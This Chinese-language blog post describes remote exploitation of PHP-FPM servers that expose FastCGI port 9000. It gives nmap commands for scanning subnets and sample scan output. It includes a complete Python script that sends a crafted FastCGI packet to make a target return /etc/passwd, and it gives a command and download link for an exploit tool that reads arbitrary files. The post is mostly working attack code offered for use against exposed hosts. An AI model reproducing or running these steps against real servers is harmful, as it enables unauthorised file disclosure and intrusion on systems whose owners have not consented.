FPM的远程利用

 看了lijiejie的博客,和乌云的PHPFastCGI的这篇文章,感觉在实际的业务中经常能遇到,所以在此记录下来:

原文:http://www.lijiejie.com/fastcgi-read-file-vulnerability-scan-py/

http://zone.wooyun.org/content/1060

 

php的fastcgi目前通常叫做FPM。他默认监听的端口是9000端口。  

可以用nmap来进行扫描一下:

nmap -sV -p 9000 --open x.x.x.x/24

检查出来的是存在9000端口开放的主机

接着用nmap来指纹识别一下:

nmap -sV -p 9000 --open 173.xxx.xxx.1/24 

结果如下:

[root@test:~/work/fcgi]#nmap -sV -p 9000 --open 173.xxx.xxx.1/24 

Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-14 20:06 EDT 
Nmap scan report for abc.net (173.xxx.xxx.111) 
Host is up (0.0095s latency). 
PORT     STATE SERVICE VERSION 
9000/tcp open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0) 
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel 

Nmap scan report for abc.com (173.xxx.xxx.183) 
Host is up (0.0096s latency). 
PORT     STATE SERVICE    VERSION 
9000/tcp open  tcpwrapped 

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 256 IP addresses (198 hosts up) scanned in 7.70 seconds

 

如果是对于内网的话可以用lijiejie写的py:

 1 import socket
 2 import sys
 3 
 4 def test_fastcgi(ip):
 5     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0)
 6     sock.connect((ip, 9000))
 7     data = """
 8     01 01 00 01 00 08 00 00  00 01 00 00 00 00 00 00
 9     01 04 00 01 00 8f 01 00  0e 03 52 45 51 55 45 53 
10     54 5f 4d 45 54 48 4f 44  47 45 54 0f 08 53 45 52 
11     56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50 
12     2f 31 2e 31 0d 01 44 4f  43 55 4d 45 4e 54 5f 52
13     4f 4f 54 2f 0b 09 52 45  4d 4f 54 45 5f 41 44 44
14     52 31 32 37 2e 30 2e 30  2e 31 0f 0b 53 43 52 49 
15     50 54 5f 46 49 4c 45 4e  41 4d 45 2f 65 74 63 2f 
16     70 61 73 73 77 64 0f 10  53 45 52 56 45 52 5f 53
17     4f 46 54 57 41 52 45 67  6f 20 2f 20 66 63 67 69
18     63 6c 69 65 6e 74 20 00  01 04 00 01 00 00 00 00
19     """
20     data_s = ''
21     for _ in data.split():
22         data_s += chr(int(_,16))
23     sock.send(data_s)
24     try:
25         ret = sock.recv(1024)
26         if ret.find(':root:') > 0:
27             print ret
28             print '%s is vulnerable!' % ip
29             return True
30         else:
31             return False
32     except Exception, e:
33         pass
34             
35     sock.close()
36 
37 
38 if __name__ == '__main__':
39     if len(sys.argv) == 1:
40         print sys.argv[0], '[ip]'
41     else:
42         test_fastcgi(sys.argv[1])

 然后就可以用:

fcgi_exp.exe read XXX.XXX.XXX.XXX 9000 /etc/passwd

EXP:http://www.lijiejie.com/wp-content/uploads/2015/06/fcgi_exp.zip

 

posted @ 2015-11-21 10:31  sevck  阅读(551)  评论(0编辑  收藏  举报